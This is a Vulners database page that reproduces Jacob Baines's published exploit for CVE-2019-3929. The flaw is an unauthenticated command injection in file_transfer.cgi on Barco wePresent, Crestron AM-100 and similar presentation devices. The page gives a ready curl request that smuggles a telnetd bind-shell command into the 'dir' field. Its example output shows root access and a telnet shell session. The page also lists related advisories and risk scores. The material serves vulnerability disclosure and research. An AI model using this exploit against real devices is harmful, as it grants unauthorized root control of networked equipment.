Vulners
Lucene search
Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | Barco / AWIND OEM Presentation Platform Unauthenticated Remote Command Injection Vulnerability | 3 May 201900:00 | – | zdt |
| Barco WePresent - file_transfer.cgi Command Injection Exploit | 15 Jan 202000:00 | – | zdt |
 | Exploit for Cross-site Scripting in Crestron Am-100_Firmware | 17 Sep 201916:23 | – | githubexploit |
 | CVE-2019-3929 | 30 Apr 201900:00 | – | attackerkb |
 | WePresent file_transfer.cgi Remote Command Execution | 30 Apr 201900:00 | – | nessus |
 | CVE-2019-3929 | 17 Dec 201914:15 | – | circl |
 | Crestron Multiple Products Command Injection Vulnerability | 15 Apr 202200:00 | – | cisa_kev |
 | Barco EOM Presentation platform Remote Code Execution (CVE-2019-3929) | 12 May 201900:00 | – | checkpoint_advisories |
 | CVE-2019-3929 | 30 Apr 201920:21 | – | cve |
 | CVE-2019-3929 | 30 Apr 201920:21 | – | cvelist |
10
##
# Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection
# Date: 05/01/2019
# Exploit Author: Jacob Baines
# Tested on: Crestron AM-100 1.6.0.2
# CVE : CVE-2019-3929
# PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k
# Advisory: https://www.tenable.com/security/research/tra-2019-20
# Writeup: https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c
# Affected Vendors/Device/Firmware:
# - Crestron AM-100 1.6.0.2
# - Crestron AM-101 2.7.0.1
# - Barco wePresent WiPG-1000P 2.3.0.10
# - Barco wePresent WiPG-1600W before 2.4.1.19
# - Extron ShareLink 200/250 2.0.3.4
# - Teq AV IT WIPS710 1.1.0.7
# - InFocus LiteShow3 1.0.16
# - InFocus LiteShow4 2.0.0.7
# - Optoma WPS-Pro 1.0.0.5
# - Blackbox HD WPS 1.0.0.5
# - SHARP PN-L703WA 1.4.2.3
##
The following curl command executes the commands "/usr/sbin/telnetd -p 1271 -l /bin/sh" and "whoami" on the target device:
curl --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" \
--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
Example:
albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" --insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
root
albinolobster@ubuntu:~$ telnet 192.168.88.250 1271
Trying 192.168.88.250...
Connected to 192.168.88.250.
Escape character is '^]'.
~/boa/cgi-bin #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 May 2019 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
CVSS 210
EPSS0.94253
SSVC